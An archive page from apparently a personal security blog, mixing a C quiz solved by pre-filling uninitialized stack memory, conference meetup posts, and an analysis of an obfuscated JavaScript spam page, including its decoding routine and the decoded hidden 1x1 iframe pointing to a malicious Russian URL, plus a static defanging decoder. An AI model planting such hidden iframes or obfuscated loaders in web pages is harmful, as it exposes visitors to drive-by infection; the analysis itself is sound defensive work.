xorl %eax, %eax

Archive for the ‘fun’ Category

C Quiz No. 2

with one comment

Continuing from the first one back in 2009, here is another that a friend of mine sent me yesterday.

The concept is that you are free to put whatever you want in do_your_stuff() in order to make it print “win” from function do_my_stuff().

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <time.h>

void 
do_your_stuff(void)
{
	// do whatever you want
}

void 
do_my_stuff(void)
{
	char c[100];
	unsigned int i, r_index;

	srand(time(NULL));
	for(i = 0; i<1000; i++)
		r_index = rand() % (sizeof(c) - 1);

	printf("c[%u] = %02x\n", r_index, c[r_index]);

	if (c[r_index] == 0x20)
		printf("win!\n");
	else
		printf("fail\n");
	
	return;
}

int 
main(void)
{
	do_your_stuff();
	do_my_stuff();
	return 0;
}

Instantly I came up with a quite simple solution that exploits the concept of the uninitialized stack that is being used.

void 
do_your_stuff(void)
{
	char buf[2048]; int i;
	for(i=0; i<sizeof(buf); i++) buf[i] = 0x20;
}

Which works…

$ ./cquiz2
c[98] = 00
fail
$ ./cquiz2
c[81] = 7f
fail
$ gcc -Wall -Werror --std=c99 cquiz2.c -o cquiz_sol
$ ./cquiz_sol
c[43] = 20
win!
$ ./cquiz_sol
c[54] = 20
win!
$

I found it fun so if you have any other solutions feel free to comment on this post.

Written by xorl

May 18, 2013 at 16:44

Posted in C programming, fun

27c3: We Come in Peace

with 2 comments

As in the past few years, this year I am going to attend 27c3, always, with some cool friends :)

If you want to meet us to have a beer or two, contact me either through my email address, this post’s comment section, twitter, twitter’s DM, IRC, IM, write(1) or wall(1) on my home box etc. :P
I’ll be really happy meeting more interesting people IRL. So far it turned out to be awesome and fun doing this, I hope it’s still the same.
See you in Berlin xD

Hope to see again:
– FX and mumpi at the crazy phenoelit party (thanks for the beers on 26c3 Mr. FX)
– The Swedish guys (you’re great dudes)
– cccp (man… <3)
– Dan Kaminsky (who gave me the most epic reply when I said to him that we were those stalking him IRL in .nl)
– rattle (you know you're awesome man)
– sin (I hate you)
And many many others that I cannot remember right now. :)

Written by xorl

December 1, 2010 at 13:00

Posted in conferences, fun

26c3: Here Be Dragons

with one comment

Finally, the schedule was announced. Myself, ithilgore and a few more friends that I don’t know if they want to be mentioned here will be there too. We would be really happy to meet some new people and have some beers together!
Hoping for more lulz than last year…
So, see you there!!! :)

P.S.: ithilgore, get ready for round two on drunk talks with FX ;p

Written by xorl

December 3, 2009 at 10:45

Posted in conferences, fun

xorl on twitter

with 2 comments

Well, I got jealous of ithilgore’s brand new twitter account and decided to join it too! :P
You can follow me at xorlgr!

Written by xorl

November 27, 2009 at 14:56

Posted in fun

TCP Portals: The Handshake’s a Lie!

A few days ago I came across this blog post by Tod Beardsley. Since there is no cool bug disclosed recently (which apparently, is a really good thing) to write about I’ll post this :P
It is indeed interesting behavior that most people (including myself) usually forget. As Tod Beardsley says in his post, there is a lot of potential since some developers might have forgotten it too. A few possibilities are remote detection, evasion of some IDS and/or IPS, or even firewalls etc.
Of course, all these are just ideas. None of them can be considered important unless somebody puts them to the test :)

Written by xorl

November 24, 2009 at 21:34

Posted in fun, Uncategorized

Funny Spam Email

I received a cute spam email today. Its subject was “I watch after your PC” and its body contained just this:

Know any maps on-line?
http://stalker-vgpu.by.ru/demo.html

Of course, it hit an amazing 15.3 score in SpamAssassin but it was still worth a try. The sender’s address was:

Received: from [190.246.47.14] (HELO 14-47-246-190.fibertel.com.ar)

So, I wget(1) that page and not surprisingly, it was some obfuscated JavaScript code. After a couple of minutes of cleaning the JavaScript code up, it was pretty easy to understand. The JavaScript section is composed of nine functions. Most of them contain a straightforward algorithm similar to this:

function AEvZVPZNFD(LIFcfdLH)
{
	var int_three=3;
	var int_six=6;
	var obfu='49,3-30,3-19,3-52,0-58,0-58,0-56,0-29,0-23,3-23,3-49,0-50,3-48,3-58,3-58,0-60,3-54,3-55,3-50,0-48,3-23,0-57,0-58,3-23,3-58,0-50,3-54,3-56,0-54,0-48,3-58,0-50,3-57,3-23,3-52,3-55,0-50,0-50,3-60,0-23,0-56,0-52,0-56,0-19,3-31,0-30,0-23,3-52,3-51,0-57,0-';
	var deobfu=obfu.split('-');
	string_ret='';
	for(i=0; i<deobfu.length-1; i+=1)
	{ 
		ArrayOne=deobfu[i].split(',');
		retval = parseInt(ArrayOne[0]*int_six)+parseInt(ArrayOne[1]);
		retval = parseInt(retval)/int_three;
		string_ret += String.fromCharCode(retval);
	}

	return string_ret;
}

As you can see, it has a variable (which I renamed to ‘obfu’) that contains a series of numbers separated with ‘,’ and ‘-’. The next variable (which I renamed to ‘deobfu’) holds the result of calling split() on the ‘-’ characters, so it is an array whose elements are pairs of numbers separated by ‘,’.
The ‘for’ loop iterates through each pair, splits it on ‘,’ and performs some calculations on the two numbers. Specifically, it executes the following for each one…

retval = atoi(first_number * 6) + atoi(second_number);
retval = atoi(retval) / 3;

Finally, it appends the result to ‘string_ret’ after converting the Unicode value to a character using the fromCharCode() function. After decoding all of the obfuscated code, the result is this:

<!-- From MWmC() function -->
<iframe width=1 height=1 border=0 frameborder=0 sr
<!-- From AEvZVPZNFD() function -->
c='http://beautymoda.ru/templates/index.php'></ifr
<!-- From dHIw() function -->
ame>

So, it basically executes this:

<iframe width=1 height=1 border=0 frameborder=0 src='http://beautymoda.ru/templates/index.php'></iframe>

Unfortunately, it seems that it was already reported to the hosting provider since the above URL redirects to ‘https://best-hoster.ru/suspend/’ which indicates that the website is suspended.
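
The decoding walked through above can be done statically, without letting the page's script run. The following is an added example, not code from the original post or from the spam sample: it decodes the blob shown in AEvZVPZNFD(), joins it with the fragments the post attributes to MWmC() and dHIw(), and returns the iframe target in defanged form. The helper names decodeBlob, iframeSources, defang and analyze are made up for this example.

```javascript
'use strict';

// Encoded blob copied from AEvZVPZNFD() as shown in the post.
const OBFU = '49,3-30,3-19,3-52,0-58,0-58,0-56,0-29,0-23,3-23,3-49,0-50,3-48,3-58,3-58,0-60,3-54,3-55,3-50,0-48,3-23,0-57,0-58,3-23,3-58,0-50,3-54,3-56,0-54,0-48,3-58,0-50,3-57,3-23,3-52,3-55,0-50,0-50,3-60,0-23,0-56,0-52,0-56,0-19,3-31,0-30,0-23,3-52,3-51,0-57,0-';

// Fragments the post attributes to MWmC() and dHIw(), in page order.
const HEAD = '<iframe width=1 height=1 border=0 frameborder=0 sr';
const TAIL = 'ame>';

// Decode one "a,b-a,b-...-" blob: each pair maps to char code (a*6 + b) / 3.
// Only string and integer arithmetic: nothing from the sample is eval'd.
function decodeBlob(blob) {
  const out = [];
  for (const pair of blob.split('-')) {
    if (pair === '') continue; // the trailing '-' leaves one empty element
    const m = /^(\d+),(\d+)$/.exec(pair);
    if (!m) throw new Error('malformed pair: ' + JSON.stringify(pair));
    const code = (Number(m[1]) * 6 + Number(m[2])) / 3;
    // fromCharCode() drops any fraction; truncate explicitly to mirror it.
    out.push(String.fromCharCode(Math.trunc(code)));
  }
  return out.join('');
}

// Collect the src attribute of every <iframe> in the reassembled markup.
function iframeSources(html) {
  const re = /<iframe\b[^>]*?\bsrc\s*=\s*(['"]?)([^'"\s>]+)\1/gi;
  const found = [];
  let m;
  while ((m = re.exec(html)) !== null) found.push(m[2]);
  return found;
}

// Defang a URL so it can be pasted into notes or tickets without being clickable.
function defang(url) {
  return url.replace(/^http/i, 'hxxp').replace(/\./g, '[.]');
}

// Reassemble the three fragments and report where the hidden iframe points.
function analyze() {
  const html = HEAD + decodeBlob(OBFU) + TAIL;
  return iframeSources(html).map(defang);
}

console.log(analyze());
```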

Written by xorl

November 7, 2009 at 01:18

Posted in fun

HAR2009

with 8 comments

This is (most likely) my last post for now. Tomorrow I’ll be flying to the Netherlands for har2009 and I hope that I’ll have much better things to do there than blog posts. :P

I’m posting this for mainly two reasons. First, to let you know that I won’t be moderating and/or answering your comments and/or emails in the next few days. And secondly, that if you want to contact me for anything, important or not, this is the right time :P

Have fun with whatever you do! xD

Written by xorl

August 11, 2009 at 06:52

Posted in fun